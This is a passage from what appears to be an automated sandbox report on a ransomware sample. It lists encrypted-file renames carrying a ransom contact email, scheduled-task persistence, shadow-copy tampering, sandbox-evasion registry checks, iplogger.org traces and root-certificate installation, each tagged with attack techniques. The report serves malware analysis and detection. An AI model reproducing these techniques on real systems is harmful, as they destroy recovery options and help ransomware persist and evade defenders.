    File opened for modificationC:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\VIEWBY.GIF.id-ABF639FB.[Bit_decrypt@protonmail.com].BOMBO16.exe
    File createdC:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\GIFT.XML.id-ABF639FB.[Bit_decrypt@protonmail.com].BOMBO16.exe
    File opened for modificationC:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx.zh_CN_5.5.0.165303.jar.id-ABF639FB.[Bit_decrypt@protonmail.com].BOMBO16.exe
    File opened for modificationC:\Program Files (x86)\Microsoft Office\Templates\1033\EssentialReport.dotx16.exe
    File opened for modificationC:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-first-quarter_partly-cloudy.png16.exe
    File createdC:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\BrightOrange\tab_off.gif.id-ABF639FB.[Bit_decrypt@protonmail.com].BOMBO16.exe
    File createdC:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\macHandle.png.id-ABF639FB.[Bit_decrypt@protonmail.com].BOMBO16.exe
    File createdC:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0182689.JPG.id-ABF639FB.[Bit_decrypt@protonmail.com].BOMBO16.exe
    File opened for modificationC:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0294989.WMF16.exe
    File opened for modificationC:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA01069_.WMF16.exe
    File opened for modificationC:\Program Files\Java\jre7\lib\zi\America\Belem.id-ABF639FB.[Bit_decrypt@protonmail.com].BOMBO16.exe
  • Launches sc.exe

    Description

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices

    Description

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

    TTPs

    System Information Discovery
  • Program crash
    WerFault.exeWerFault.exe

    Reported IOCs

    pidpid_targetprocesstarget process
    17203384WerFault.exe21.exe
    48283968WerFault.exeBTRSetp.exe
  • Checks processor information in registry
    azur.exewinit.exe

    Description

    Processor information is often read in order to detect sandboxing environments.

    TTPs

    Query RegistrySystem Information Discovery

    Reported IOCs

    descriptioniocprocess
    Key opened\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0azur.exe
    Key value queried\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameStringazur.exe
    Key opened\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0winit.exe
    Key value queried\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameStringwinit.exe
  • Creates scheduled task(s)
    schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

    Description

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    TTPs

    Scheduled Task

    Reported IOCs

    pidprocess
    1520schtasks.exe
    1416schtasks.exe
    3664schtasks.exe
    4116schtasks.exe
    4524schtasks.exe
    2016schtasks.exe
    1036schtasks.exe
    1636schtasks.exe
    1528schtasks.exe
    3908schtasks.exe
    2164schtasks.exe
    4564schtasks.exe
    1680schtasks.exe
  • Delays execution with timeout.exe
    timeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exe

    Tags

    Reported IOCs

    pidprocess
    3584timeout.exe
    2860timeout.exe
    4708timeout.exe
    1016timeout.exe
    2928timeout.exe
    2524timeout.exe
  • Gathers network information
    ipconfig.exeNETSTAT.EXE

    Description

    Uses commandline utility to view network configuration.

    TTPs

    System Information DiscoveryCommand-Line Interface

    Reported IOCs

    pidprocess
    5272ipconfig.exe
    2920NETSTAT.EXE
  • Interacts with shadow copies
    vssadmin.exevssadmin.exe

    Description

    Shadow copies are often targeted by ransomware to inhibit system recovery.

    Tags

    TTPs

    File DeletionInhibit System Recovery

    Reported IOCs

    pidprocess
    4044vssadmin.exe
    1112vssadmin.exe
  • Kills process with taskkill
    taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

    Tags

    Reported IOCs

    pidprocess
    4792taskkill.exe
    2412taskkill.exe
    1224taskkill.exe
    1812taskkill.exe
    3792taskkill.exe
    2940taskkill.exe
  • Modifies Internet Explorer settings
    IEXPLORE.EXEiexplore.exeiexplore.exeIEXPLORE.EXEmshta.exemstsc.exeIEXPLORE.EXEcmmon32.exe

    TTPs

    Modify Registry

    Reported IOCs

    descriptioniocprocess
    Set value (int)\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\DOMStorage\iplogger.org\ = "18"IEXPLORE.EXE
    Key created\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgainiexplore.exe
    Key created\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowseriexplore.exe
    Set value (str)\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"iexplore.exe
    Key created\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\DOMStorageIEXPLORE.EXE
    Key created\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\TabbedBrowsingiexplore.exe
    Key created\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MainIEXPLORE.EXE
    Key created\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNamesiexplore.exe
    Key created\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\InternetRegistryiexplore.exe
    Key created\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMiciexplore.exe
    Key created\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\IETld\LowMiciexplore.exe
    Key created\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActiveiexplore.exe
    Set value (str)\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"iexplore.exe
    Set value (int)\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"iexplore.exe
    Set value (int)\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1"iexplore.exe
    Key created\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPageiexplore.exe
    Set value (data)\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = d00f0c3d9abed601iexplore.exe
    Key created\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMiciexplore.exe
    Key created\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Mainmshta.exe
    Set value (str)\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"IEXPLORE.EXE
    Set value (int)\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"iexplore.exe
    Set value (int)\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "18"IEXPLORE.EXE
    Key created\Registry\User\S-1-5-21-3825035466-2522850611-591511364-1000\SOFTWARE\Microsoft\Internet Explorer\IntelliForms\Storage2mstsc.exe
    Key created\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearchiexplore.exe
    Key created\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\InternetRegistryiexplore.exe
    Set value (int)\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"iexplore.exe
    Key created\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearchIEXPLORE.EXE
    Key created\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\PageSetupiexplore.exe
    Set value (data)\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff3d0000003d000000c3040000a2020000iexplore.exe
    Key created\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\IntelliFormsiexplore.exe
    Key created\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowseriexplore.exe
    Set value (data)\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000iexplore.exe
    Key created\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\iexplore.exe
    Key created\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\IETld\LowMiciexplore.exe
    Key created\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\LowRegistryiexplore.exe
    Set value (int)\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\DOMStorage\iplogger.org\NumberOfSubdomains = "1"IEXPLORE.EXE
    Key created\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Mainiexplore.exe
    Key created\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\LowRegistryiexplore.exe
    Key created\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Zoomiexplore.exe
    Set value (str)\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1"iexplore.exe
    Key created\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Mainiexplore.exe
    Set value (int)\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{6B1DA300-2A8C-11EB-AE0F-E67B5CAEC115} = "0"iexplore.exe
    Key created\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecoveryiexplore.exe
    Key created\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Zoomiexplore.exe
    Key created\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MINIEiexplore.exe
    Key created\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Toolbariexplore.exe
    Key created\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\DomainSuggestioniexplore.exe
    Key created\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorageiexplore.exe
    Set value (str)\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"IEXPLORE.EXE
    Key created\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearchiexplore.exe
    Set value (int)\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "312571896"iexplore.exe
    Set value (int)\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"iexplore.exe
    Set value (int)\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{FD934230-2A8C-11EB-AE0F-E67B5CAEC115} = "0"iexplore.exe
    Key created\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MainIEXPLORE.EXE
    Set value (data)\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff3d0000003d000000c3040000a2020000iexplore.exe
    Key created\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MainIEXPLORE.EXE
    Key created\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\GPUiexplore.exe
    Key created\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorageiexplore.exe
    Key created\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\PageSetupiexplore.exe
    Key created\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\DOMStorage\iplogger.orgIEXPLORE.EXE
    Key created\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearchIEXPLORE.EXE
    Key created\Registry\User\S-1-5-21-3825035466-2522850611-591511364-1000\SOFTWARE\Microsoft\Internet Explorer\IntelliForms\Storage2cmmon32.exe
    Key created\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\GPUiexplore.exe
    Key created\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\IntelliFormsiexplore.exe
  • Modifies data under HKEY_USERS
    svchost.exe

    Reported IOCs

    descriptioniocprocess
    Key created\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CTLssvchost.exe
    Key created\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLssvchost.exe
    Key created\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLssvchost.exe
    Key created\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trustsvchost.exe
    Key created\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificatessvchost.exe
    Key created\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Mysvchost.exe
    Key created\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLssvchost.exe
    Key created\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLssvchost.exe
    Key created\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLssvchost.exe
    Key created\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRootsvchost.exe
    Key created\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificatessvchost.exe
    Key created\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLssvchost.exe
    Key created\REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\25\52C64B7Esvchost.exe
    Key created\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\Certificatessvchost.exe
    Key created\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLssvchost.exe
    Key created\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificatessvchost.exe
    Key created\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowedsvchost.exe
    Key created\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CRLssvchost.exe
    Key created\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificatessvchost.exe
    Key created\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CRLssvchost.exe
    Key created\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeoplesvchost.exe
    Key created\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CAsvchost.exe
    Key created\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificatessvchost.exe
    Key created\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLssvchost.exe
    Key created\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLssvchost.exe
    Key created\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeoplesvchost.exe
    Key created\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLssvchost.exe
    Key created\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLssvchost.exe
    Key created\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CAsvchost.exe
    Key created\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowedsvchost.exe
    Key created\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Rootsvchost.exe
    Key created\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLssvchost.exe
    Key created\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\Certificatessvchost.exe
    Key created\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\CRLssvchost.exe
    Key created\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\CTLssvchost.exe
    Key created\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CTLssvchost.exe
    Key created\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificatessvchost.exe
    Key created\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trustsvchost.exe
    Key created\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificatessvchost.exe
    Key created\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\Certificatessvchost.exe
    Key created\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLssvchost.exe
    Key created\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLssvchost.exe
    Key created\REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCachesvchost.exe
  • Modifies registry class
    winit.exe

    Reported IOCs

    descriptioniocprocess
    Key created\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Codepagewinit.exe
    Key created\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Databasewinit.exe
    Key created\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Charsetwinit.exe
  • Modifies registry key
    REG.exe

    TTPs

    Modify Registry

    Reported IOCs

    pidprocess
    3552REG.exe
  • Modifies system certificate store
    14.exewinit.exealiens.exejg2_2qua.exeintro.exeintro.exe

    TTPs

    Install Root CertificateModify Registry

    Reported IOCs

    descriptioniocprocess
    Set value (data)\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a14.exe
    Set value (data)\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a14.exe
    Set value (data)\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\SystemCertificates\CA\Certificates\D89E3BD43D5D909B47A18977AA9D5CE36CEE184C\Blob = 030000000100000014000000d89e3bd43d5d909b47a18977aa9d5ce36cee184c1400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb040000000100000010000000285ec909c4ab0d2d57f5086b225799aa0f000000010000003000000013baa039635f1c5292a8c2f36aae7e1d25c025202e9092f5b0f53f5f752dfa9c71b3d1b8d9a6358fcee6ec75622fabf9190000000100000010000000ea6089055218053dd01e37e1d806eedf1800000001000000100000002aa1c05e2ae606f198c2c5e937c97aa22000000001000000850500003082058130820469a00302010202103972443af922b751d7d36c10dd313595300d06092a864886f70d01010c0500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3139303331323030303030305a170d3238313233313233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc3a19b45fa6bd7d9da36342b676f2a93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a381f23081ef301f0603551d23041830168014a0110a233e96f107ece2af29ef82a57fd030a4b4301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff30110603551d20040a300830060604551d200030430603551d1f043c303a3038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c303406082b0601050507010104283026302406082b060105050730018618687474703a2f2f6f6373702e636f6d6f646f63612e636f6d300d06092a864886f70d01010c05000382010100188751dc74213d9c8ae027b733d02eccecf0e6